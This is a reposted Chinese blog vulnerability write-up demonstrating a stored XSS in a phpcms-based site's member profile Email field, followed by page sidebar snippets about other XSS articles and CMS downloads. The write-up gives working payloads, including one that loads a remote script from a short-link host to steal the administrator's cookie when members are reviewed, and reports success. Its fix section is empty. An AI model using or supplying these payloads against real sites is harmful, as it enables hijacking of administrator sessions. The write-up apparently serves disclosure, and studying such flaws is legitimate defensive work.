phpcms某处储存型XSS(demo+本地演示)

最新推荐文章于 2024-01-23 04:00:00 发布
最新推荐文章于 2024-01-23 04:00:00 发布
阅读量78 收藏
点赞数
原文链接:http://www.cnblogs.com/h4ck0ne/p/5154704.html
版权

详细说明:

demo+本地演示



存在XSS的地方在商务中心的商家资料的我的资料的Email那里(这句话好绕口。。),属于过滤不严格随便插字符的问题,我直接在Email那里写上"/><svg οnlοad=alert(/1/)>可以看到是正确的



然后点击提交可以看到说操作成功



然后来到我们的企业首页查看可以看到成功弹窗

 



再查看下源代码,可以看到是储存型的



本来想去后台查看的,但是无奈demo不提供后台演示,只好本地搭建看看了,本地搭建好了以后来到后台查看是不能直接打后台的,但是管理员审核会员的时候会到会员的企业查看,这个时候可以看到成功弹窗

 



然后继续构造:"/><script src=http://t.cn/Rz4Oi2b></script>,提交后看看能不能打cookie



可以看到已经成功打到cookie~

漏洞证明:

修复方案:

转载于:https://www.cnblogs.com/h4ck0ne/p/5154704.html

weixin_30693683
关注
[zkaq靶场]XSS--存储XSS
wwxxee
05-09 442
存储XSS 靶场 靶场cms是Fine CMS,其版本为v5.3.0。 搜索该cms的漏洞。 参考:https://www.jianshu.com/p/200ea62486d9 简单来说就是,该cms会将错误日志写入文件,但是写入过程中没有对错误信息过滤,直接写入了文件。然后该cms后台提供错误日志查看功能,错误日志信息直接读取上述文件,当管理员在后台查看错误日志时,程序从文件中读取日志信息。所以攻击点在于控制错误日志的信息。 当错误日志写入文件的信息可控时,管理员在后台查看错误日志,就可以触发xs
php代码审计【7】存储xss
司徒荆的博客
06-26 587
php代码审计【7】存储xss
存储 XSS 攻击演示(附链接)
Flag少侠的博客
01-23 1509
存储 XSS 攻击演示(附链接)
Isea cms v1.0 存储XSS
weixin_46801402的博客
11-01 182
Isea cms v1.0 存储XSS
phpcms-shopping:PHPCMS V9积分商城原始代码包+安装教程,购物车,积分兑换,订单支付
03-24
PHPCMS V9积分商城原始包+安装教程 PHPCMS V9是国内顶级优秀的CMS系统,但是国内的开发人员为此提供的插件及其模块很少,当我们需要在开发中需要用到一个积分商城的模块的时候,发现全网都没有,这里是一个PHPCMS V9...
phpcms v9 购物车+商品模块+订单 最新V9商城插件
03-23
本插件是针对PHPCMS V9系统设计的,主要包含了购物车、商品管理和订单处理功能,为搭建专业化的在线商城提供了便利。 1. **购物车模块**: - 购物车功能是电商系统的核心部分,允许用户选择商品并暂存,以便一次性...
CMS程序PHPCMS + HDwiki整合版 GBK版-phpcms-hdwiki-gbk.zip
03-09
【PHP CMS程序PHPCMS与HDwiki整合版GBK版】是一种常见的内容管理系统(CMS)解决方案,结合了PHPCMS的强大内容管理功能与HDwiki的高效百科构建能力,以GBK编码格式提供服务。这个整合版主要面向需要搭建内容丰富的...
CMS程序PHPCMS + HDwiki整合版 UTF-8版-phpcms-hdwiki-utf8.zip
最新发布
03-09
PHPCMS是一款流行的开源内容管理系统(CMS),专为构建企业网站、新闻门户和其他信息平台而设计。它提供了强大的内容发布、管理、权限控制以及搜索引擎优化功能。与HDwiki的整合版意味着用户可以在同一平台上实现...
存储XSS CMS实战
她叫常玉莹
08-10 1393
Dedecms存储xss 影响版本 DedeCMS-V5.7-UTF8-SP2,网站需要开启商城功能。 漏洞分析 address、des、email、postname参数过滤不严导致xss漏洞。postname只对长度做了限制。跟踪cn_substrR函数,跳转到string.helper.php文件中。 只使用stripslashes、addslashes函数进行了过滤,导致xss触发 漏洞修复 使用htmlspecialchars将html标签进行实体转义 修复结果 phpmywind_5.3
PHP代码审计 05 XSS 存储漏洞
kevinhanser
07-20 613
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 存储 XSS 漏洞 代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS 比较危险,容易造成蠕虫,盗窃cookie 等 审计 SQL 语句 主要是update insert 更新和插入语句内容输入输出没有被过滤或者过滤不严 防...
PHPcms利用xss执行sql注入
weixin_34149796的博客
09-17 282
来自:http://superman.php100.com/昨天看见phpcmsv9.1.15爆的xss和无权限的sql注入,于是就想测试下利用xss执行sql注入,虽然爆的这个phpcms漏洞还有很多其他的用法!但是,这个注入我没有找到phpcmsv9.1.15测试,其他版本都没有测试成功!于是乎我只有假想下一个极端环境:1.前台有且只有一个xss漏洞(不能获取管理员c...
【存储XSS
==
03-05 730
存储XSS $input =$_GET['inout']; $code= <<<CODE <textarea>$input</textarea> CODE;
3-3存储形XSS漏洞演示
山兔的博客
04-14 2210
存储XSS和DOMXSS的解析  存储XSS演示和与原理分析  DomXSS演示和原理分析 存储XSS漏洞 存储XSS漏洞跟反射形成的原因一样,不同的是存储XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储XSS也称“永久XSS。 存储XSS漏洞演示 我们切换到pikachu存储xss栏目 我们看到他这个地方有留言板,我们试着留个言,点提交 我们发现这个留言会被存储到页面上面,我们刷新这个页面,留言一直在这里,也就是说,我们提交的这个留言,被后台给存下
用HTML+PHP写一个留言板来进行XSS测试&学习 第二篇(POST储存)
JackholeLiu的博客
04-09 2196
第一篇写的留言板实在不叫留言板,只能是个反射的简单应用 为了学习储存XSS的攻击与防护,现在还需要写一个能提交到数据库里并且能被网页读取的留言板 我用到了POST ,数据库则用生成文本,读取文本来简单模拟过程 文件名:chc_index.php GUEST BOOK ,HELLO LOSER 留言板 info: user: <?php if(
【代码审计】iZhanCMS_v2.1 前台存储XSS漏洞分析
12-03 484
  0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms.com/category/Category/index/cid/1 默认后台:http://127.0.0.1/admin/admin/index 默认用户名:admin  密...
【代码审计】eduaskcms_v1.0.7前台存储XSS漏洞分析
12-03 485
&#13;  &#13; 0x00 环境准备&#13; eduaskcms官网:https://www.eduaskcms.xin&#13; 网站源码版本:eduaskcms-1.0.7&#13; 程序源码下载:https://www.eduaskcms.xin/download/show/5.html&#13; 默认后台地址:http://127.0.0.1/public/...
PHP防止xss攻击
yang_ldgd的博客
08-16 603
php防xss攻击
存储XSS的攻防:不想做开发的黑客不是好黑客
qq_44005305的博客
03-13 304
福利:\[网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!\]](本文只对存储XSS进行分析。那么,什么是存储XSS呢?它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,一般是注入一段javascript脚本。复制通过这段js代码,弹个框来证明存在xss漏洞。那么,可能新手就会问了,弹个框有什么用呢?其实,弹框只是为了证明存在此漏洞。而此漏洞的利用方式由很多种。比如,你可以使用xss平台:复制。
PHPCMS数据库设计解析
"PHPCMS数据库设计文档详细介绍了该CMS系统的数据结构,包括管理员、管理员权限和广告等核心模块的设计。这份文档对于理解和使用PHPCMS的数据库管理有着重要的指导作用,适合初学者学习和参考。" PHPCMS是基于PHP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值